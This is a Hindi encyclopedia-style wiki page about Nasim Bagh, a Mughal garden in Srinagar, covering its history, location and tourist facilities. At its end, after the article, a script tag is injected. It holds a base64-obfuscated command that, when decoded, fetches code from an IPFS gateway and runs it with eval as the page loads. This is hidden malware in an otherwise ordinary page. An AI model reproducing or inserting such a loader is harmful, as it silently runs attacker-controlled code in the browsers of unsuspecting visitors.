नसीम बाग़

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 06:05, 15 जून 2014 का अवतरण (''''नसीम बाग़''' जम्मू-कश्मीर की राजधानी श्रीनगर में ...' के साथ नया पन्ना बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

नसीम बाग़ जम्मू-कश्मीर की राजधानी श्रीनगर में स्थित है। इस बाग़ को 'गार्डन ऑफ़ ब्रीज' के नाम से भी जाना जाता है, जो एक प्रसिद्ध मुग़ल गार्डन है।

  • श्रीनगर का यह प्रसिद्ध बाग़ 'डल झील' के पश्चिमी ओर स्थित है।
  • महान मुग़ल बादशाह अकबर ने अपने शासनकाल के दौरान 1586 ई. में एक बगीचे का निर्माण करवाया था। बाद में 1635 ई. में एक और प्रसिद्ध मुग़ल बादशाह शाहजहाँ ने इस उद्यान में लगभग 1200 पेड़ लगवाएं और यह बगीचा बाग़ में बदल गया।[1]
  • झेलम नदी के तट पर स्थित इस उद्यान में कई झीलें और हाउसबोट हैं, जो यहां आने वाले पर्यटकों के आकर्षण का मुख्‍य केंद्र हैं।
  • नसीम बाग़ आने वाले आगुंतकों के लिए कैम्पिंग की सुविधा भी प्रदान की जाती है।
  • यहाँ आने वाले पर्यटक यहां से पांरपरिक कश्‍मीरी हस्‍तशिल्‍प और सूखे मेवे भी खरीद सकते हैं।
  • वैसे तो नसीम बाग़ साल भर खुला र‍हता है, लेकिन अप्रैल से जून के बीच में यहां आने का सबसे अच्‍छा मौसम होता है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. नसीम बाग, श्रीनगर (हिन्दी)। । अभिगमन तिथि: 15 जून, 2014।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>